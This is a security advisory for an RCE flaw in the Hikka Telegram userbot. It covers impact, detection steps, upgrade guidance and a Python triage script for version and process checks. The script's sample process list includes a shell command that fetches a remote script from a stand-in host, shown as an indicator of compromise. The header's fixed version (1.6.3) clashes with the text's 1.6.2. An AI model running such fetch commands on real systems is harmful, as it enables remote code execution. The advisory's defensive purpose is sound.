Platform
python
Component
hikariatama/hikka
Fixed in
1.6.3
CVE-2025-52571 describes a Remote Code Execution (RCE) vulnerability within Hikka, a Telegram userbot. This vulnerability allows an unauthenticated attacker to compromise a victim's Telegram account and gain full access to the server hosting the userbot. The vulnerability impacts versions of Hikka and its forks prior to 1.6.2, and a patch has been released in version 1.6.2.
The impact of this vulnerability is severe. An attacker can leverage it to completely take over a victim's Telegram account, potentially accessing sensitive information, sending messages as the victim, and performing actions on their behalf. Furthermore, the attacker gains full access to the server hosting the Hikka userbot, enabling them to execute arbitrary code, steal data, install malware, or pivot to other systems on the network. This represents a significant security risk, especially if the server hosts other sensitive applications or data.
This vulnerability was publicly disclosed on 2025-06-24. There are currently no known public exploits or active campaigns targeting CVE-2025-52571, and it is not listed in the CISA KEV catalog. Note that the CVSS score (9.7) measures impact, not likelihood: an unauthenticated RCE that ends in Telegram account and server takeover is about as severe as it gets, while the EPSS estimate (0.18%) currently rates the probability of in-the-wild exploitation as low. The severity, not the EPSS figure, is the reason to patch now.
Users of Hikka Telegram userbot, particularly those running versions prior to 1.6.2, are at significant risk. This includes individuals and organizations utilizing Hikka for automated Telegram tasks or bot development. Shared hosting environments where multiple users share the same server are also at increased risk, as a compromise of one user's Hikka instance could potentially lead to broader system compromise.
• python / server: ps aux | grep hikka (lists Hikka processes and the account they run under)
• python / server: Check for unusual processes running under the Hikka user account, such as shells or download tools spawned by the userbot.
• python / server: Examine system logs for suspicious commands or network connections originating from the Hikka userbot.
• python / server: Monitor for unauthorized Telegram account activity (new sessions, messages the owner did not send) associated with the affected server.
Exploit Status
disclosure
EPSS
0.18% (40th percentile)
The primary mitigation for CVE-2025-52571 is to immediately upgrade Hikka to version 1.6.2 or later. Due to the nature of the RCE vulnerability, there are no known workarounds beyond upgrading. Enable automatic updates where possible to shorten the exposure window for future issues. After upgrading, verify the installed version and review system logs for suspicious activity. Because the vulnerability hands the attacker the Telegram account itself, an upgrade does not evict an intruder who is already inside: if compromise is suspected, terminate the other active sessions from the Telegram client, replace the userbot's session, and treat the host as compromised rather than merely patched.
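As an added example (not code from the Hikka project or from this advisory), the following Python script implements the checks above: it decides whether an installed version predates the 1.6.2 fix, comparing numerically so that a 1.10.x release is not mistaken for an old one, and it parses ps aux output to list Hikka processes and flag anything unexpected running under the userbot account. The __version__ = (1, 6, 1) tuple layout of hikka/version.py, the name of the service account, and the sample process list are assumptions constructed for the example; verify them against your own checkout and host.

```python
"""Version and process checks for CVE-2025-52571 (added example, not Hikka project code)."""
from __future__ import annotations

import re
from typing import NamedTuple

# Version that carries the fix, per the advisory text on this page.
FIXED_VERSION = (1, 6, 2)

# Plain "1.6.1" / "v1.6.1" strings, and the "__version__ = (1, 6, 1)" tuple form that
# hikka/version.py is assumed to use (assumption: check your checkout).
_DOTTED_RE = re.compile(r"\bv?(\d+)\.(\d+)\.(\d+)\b")
_TUPLE_RE = re.compile(r"__version__\s*=\s*\(\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)\s*\)")


def parse_version(text: str) -> tuple[int, int, int]:
    """Extract (major, minor, patch) from a version string or a version.py line."""
    match = _TUPLE_RE.search(text) or _DOTTED_RE.search(text)
    if match is None:
        raise ValueError(f"no version found in {text!r}")
    major, minor, patch = (int(g) for g in match.groups())
    return (major, minor, patch)


def is_vulnerable(version: str | tuple[int, ...]) -> bool:
    """True when the version predates FIXED_VERSION.

    Tuples compare element-wise, so 1.10.0 is correctly newer than 1.6.2;
    a plain string comparison ("1.10.0" < "1.6.2") would get this wrong.
    """
    if isinstance(version, str):
        version = parse_version(version)
    return tuple(version) < FIXED_VERSION


class Proc(NamedTuple):
    user: str
    pid: int
    command: str


def parse_ps_aux(ps_output: str) -> list[Proc]:
    """Parse `ps aux` text into Proc records; the header line is skipped."""
    procs = []
    for line in ps_output.splitlines()[1:]:
        fields = line.split(None, 10)  # 11 columns; COMMAND keeps its spaces
        if len(fields) == 11:
            procs.append(Proc(fields[0], int(fields[1]), fields[10]))
    return procs


def find_hikka_processes(ps_output: str) -> list[Proc]:
    """Processes whose command line mentions hikka, excluding the grep a pipeline adds."""
    return [p for p in parse_ps_aux(ps_output)
            if "hikka" in p.command.lower() and not p.command.startswith("grep")]


def unexpected_under_user(ps_output: str, user: str,
                          expected: tuple[str, ...] = ("python",)) -> list[Proc]:
    """Processes owned by `user` whose executable is not an expected interpreter.

    A shell, curl or wget running as the userbot account is the kind of child
    process an RCE leaves behind and is worth investigating.
    """
    flagged = []
    for p in parse_ps_aux(ps_output):
        if p.user != user:
            continue
        exe = p.command.split()[0].rsplit("/", 1)[-1]  # basename of the executable
        if not exe.startswith(expected):
            flagged.append(p)
    return flagged


# Constructed sample output, not a capture from a real host.
SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1 167000 11000 ?        Ss   10:00   0:01 /sbin/init
hikka     1337  2.0  3.4 512000 98000 ?        Sl   10:05   1:12 python3 -m hikka
hikka     1350  0.0  0.0  12000  3000 ?        S    10:06   0:00 /bin/sh -c curl http://example.invalid/x.sh
admin     2048  0.0  0.0   9000  1000 pts/0    S+   10:30   0:00 grep hikka
"""

if __name__ == "__main__":
    for v in ("1.6.1", "v1.6.2", "1.10.0", "__version__ = (1, 5, 9)"):
        print(f"{v!r:32} vulnerable={is_vulnerable(v)}")
    print("hikka processes:", find_hikka_processes(SAMPLE_PS))
    print("unexpected under hikka:", unexpected_under_user(SAMPLE_PS, "hikka"))
```

On a real host, feed the output of ps aux (and the contents of hikka/version.py) into these functions instead of the constructed sample; the process check is a triage aid, not proof of compromise, and anything it flags should be followed up in the system logs as described above.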
Upgrade Hikka to version 1.6.2 or later. This version contains the security fix that prevents the remote code execution. The upgrade can be performed with the package manager that was used to install Hikka.
CVE-2025-52571 is a critical RCE vulnerability affecting Hikka Telegram userbots in versions prior to 1.6.2, allowing an unauthenticated attacker to gain control of the Telegram account and the hosting server.
You are affected if you are running a Hikka version (or fork) earlier than 1.6.2. Upgrade to 1.6.2 or later immediately to mitigate the risk.
Upgrade Hikka to version 1.6.2 or later. There are no known workarounds besides upgrading.
Currently, there are no confirmed reports of active exploitation, but the high severity score suggests a potential for future attacks.
Refer to the official Hikka project repository or website for the latest security advisories and release notes.